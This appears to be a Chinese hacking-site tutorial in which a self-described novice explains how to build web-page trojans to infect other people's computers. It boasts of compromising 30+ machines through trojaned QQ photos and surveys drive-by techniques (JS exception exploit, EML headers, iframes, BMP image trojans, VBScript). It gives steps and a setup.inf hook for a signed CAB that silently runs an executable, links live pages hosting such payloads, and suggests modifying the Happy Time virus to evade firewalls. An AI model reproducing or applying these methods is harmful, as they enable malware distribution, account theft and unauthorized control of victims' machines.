| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

黑客技术

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·五种windows密码设置及破解
·穿过局域网的我的手 内网远程控制全攻略
·不用任何软件(木马程序)盗取账号密码
·EXE、DLL文件的脱壳
·黑客技术:SQL入侵教程
·美萍的破解方法
·Windows黑客编程基础
·硬盘还原卡的破解
·win2000密码破解不完全指南
·大话网络之经典入侵技术

站内搜索

菜鸟学做网页木马

要知道“大虾走门,菜鸟走窗”我说的。我是个菜菜鸟所以我知道这一
点,我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东,我有QQ发给“好友”带木的照片来完成进入,再由她机器收到
的QQ在发… 好累!有了些成就好像最多时有30多个肉鸡,但免费的空间要收
费了(免费餐不多了)几个星期的心血白费。主要是没有时间,还好上黑白上
看到了网页木马-图片木马,对我这样的菜鸟来说就是个天大的好事,放到网
页上成功。什么还有EML头啊太好了不用自己动手全搞定。时之不常我的肉鸡
又由多变少了为什么呢!到网吧一试才知道这全过时了,网吧装了金山防火和
还原精灵,一上网页就杀之!怎么办只有自己动手了!
  
(一)首先我想了想自己知道的网页木马的优点和不足:

一,JS.Exception.EXploit
 “雪峰,我的首页被改,桌面被…”QQ上的好友向我求救,“老大,和
你学了这么多年电脑怎么还在网虫的页上被黑,告诉你上黑白上学学吧
 要不千万别上菜鸟页上玩,要不会死的”

二,EML头
“小弟前些天给我的QQ全没了”,“黑鸟大哥十几个全没了不会吧是不
 是你的机器…”打车前去看了看,发现TEMP里有个EXE名为QQpass这不
 是收QQ的东东,虽没用过非它不过了。“大哥,你常写信吗”“不啊,
为什么会被偷呢,我有防火墙呀是新买的”“不要让我来教你吧,你可
是我的老师,亡羊补牢你不知道吗?防是在发毒发之后不多说了,你要
 不打个补丁,要不就卸了收信程序吧”

 三,iframe
 漏洞也不太会用,但看介绍还好用。

 四,.EXE to .BMP +JS.Exception.EXploit
 这就是图片木马吧,但我不喜欢JS,这种网虫页里的东东防火墙叫个不
 停,还会驱走很多访客,黑下注册表肯定也会被人改回的,而后的.VBS
 还会有什么用呢,它是在下次开机才运行的。但我喜欢做这个.BMP的那
 个老师,原理是好的。(下面我用到了)

 *五,通过安全认证的CAB, COX
这使我这个菜菜鸟无能为力,百分百中招了,试求哪位大虾也帮我把我
的文件上签个微软的大名要年头长些的,要不老过期。

 (在黑白上没看到这个源码,所以自己改过加上)
 原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位置找 .cab
并在系统里写入个CID读入 .cab 里的文件。
方法:.cab是WINDOWS里的压缩文件,我们知道IE里所用的安全文件是用签名的CAB也不例
     外,所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击,只所以每次都能
     入侵我的脑,是因为它通过的是IE认证下的安全攻击,这样不管我怎么做都没办法。
  制做方法:因本人水平有限(参)
      软件:1.安全证书管理。  2.CAB压缩或安装盘制做
    先到,IE里找安全-内容,里面有证书,我们找一个就行。导出 *.CER
    在用证书管理打开*.CER 导出证书.SPC和密钥.PVK。
    这样我们就可以做 .cab 了。
    做一个setup.inf
 [Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\文件.exe

[Version]
Signature=$CHICAGO$
AdvancedInf=2.0

    最重要我所用的是安装盘制做,ADD sdtup.inf OR文件.exe
 然后 导入证书.SPC和密钥.PVK。
实例在我的免费空间上不过下载的是成人拔号器千万别点
 (合法的签名)是安全的
 http://jzs.3322.net/live/index.html

六,VBScript
我想这是很多病毒最爱用的了不用多说吧网页和文件常用的语言。

七,综合所感优点组合
iframe 成两个窗,其一为.BMP+VBScript
 其二为EML头的变种.mht(真对打了打补丁的不会做,可以用网页合并器合成)
实例没试过成功的话在桌面上多个“女友爱你
.EXE”文件加长为的是不要她看到EXE。晕!图标没改以后在说。
网址 http://jzs.3322.net/inbb.htm


 总,试我的方法在自己机器上运行成功,只因时间有限源码没转成BMP,你可以
 自己转下,黑白上有不多说。我做的源码里没加RUN “文件路径”,如果加了
 就可以自动运行没有问题,对于网吧的还原精灵吗,有个还原精灵清除器很好用的。
(二)想像与求助
八,运用ASP因为它内置了VBS
我想的不知道是不可行,因VBS功能很强大,但ASP内的VBS和文件里的有些
差别不能放之就用,我又菜希望有人帮,自己做的可以改自己的注册表,但
改别人的没试成(是不是我用的是自己的服务器呢别人的ASP空间不开脚本)
大虾帮我写个文章<<ASP做网页木马>>
九,运用Flash的动作VBS
看过6.0里好像可以但不太会,我想可行,绻镂倚次蚁刃涣?
十,以避防火,可以改下欢乐时光的源码
这个不多说,您可能听过它是病毒了,它不比ActiveX,JS还可以碰到注册表
那只不过是个脚本吗,欢乐时光是病毒防火全防在外的,没办法改改吧,谁让
它用的原理好呢,我试过把它的13号发做删了(太毒了)但防火还防。如果大虾
可以帮我上网下个源码吧,要不找我雪峰要也行我把写过的放到文尾。注意呀
不要在自己的机器上试呀,我试了传染的几秒的事,整个系统呀,手工杀了我
半个多小时,我没杀的软件。
源文件:



相关文章
  • 动态嵌入式DLL木马发现与清除
  • 木马清除百种方法
  • 中毒电脑多薄命:剖析坏木马加载方式
  • “木马”万能查杀法
  • ASP木马的灵活运用
  • 黑客常用兵器之木马篇
  • Windows 2000默认权限可引来“特洛伊木马”
  • 相关软件


    下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图